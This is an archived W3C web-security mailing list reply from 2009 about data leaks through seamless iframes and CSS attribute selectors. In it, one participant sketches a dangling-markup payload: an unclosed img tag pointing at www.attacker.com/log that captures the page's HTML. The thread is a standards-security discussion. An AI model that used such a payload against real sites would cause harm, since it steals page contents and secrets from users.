W3C home > Mailing lists > Public > public-web-security@w3.org > December 2009

Re: Seamless iframes + CSS3 selectors = bad idea

From: <sird@rckc.at>
Date: Tue, 8 Dec 2009 17:47:42 +0800
Message-ID: <8ba534860912080147u72c431ffsa805420b164b0fd8@mail.gmail.com>
To: Daniel Glazman <daniel@glazman.org>
Cc: Adam Barth <w3c@adambarth.com>, Thomas Roessler <tlr@w3.org>, public-web-security@w3.org
@daniel, we are asuming the attacker can't inject JS.. so has no access to
the DOM.

On some browsers anyway, he could do <img src='
http://www.attacker.com/log?html=

without closing the tag and fetch everything.. but maybe that's a new attack
and need a different thread as well.. hahaha

Greetings!!

-- Eduardo
http://www.sirdarckcat.net/

Sent from Hangzhou, 33, China

On Tue, Dec 8, 2009 at 5:42 PM, Daniel Glazman <daniel@glazman.org> wrote:

> Adam Barth wrote:
>
>  3. kill attribute selectors; will never happen, period.
>>>
>>
>> Can you elaborate on this point?  Why is this off the table?
>>
>
> Because millions of people use it? Because millions of web sites
> use it? Because the feature is absolutely needed by them and it's
> not the right thing to do?
>
>
>  I don't understand why that would help.  Wouldn't the attacker simply
>> load their stylesheet in a non-sandboxed mode?
>>
>
> If the attacker has the ability to load in non-sandboxed mode, he/she
> has the ability to (a) create a <link> or <style> element and then CSS
> is the least problem since the attacker has access to the whole DOM
> (b) be a man-in-between and replace a linked stylesheet by his/her own;
> again, if he/she can do that, targetting JS is a much better option.
>
> </Daniel>
>
>
Received on Tuesday, 8 December 2009 09:48:45 GMT

This archive was generated by hypermail 2.2.0+W3C-0.50 : Sunday, 19 December 2010 00:16:01 GMT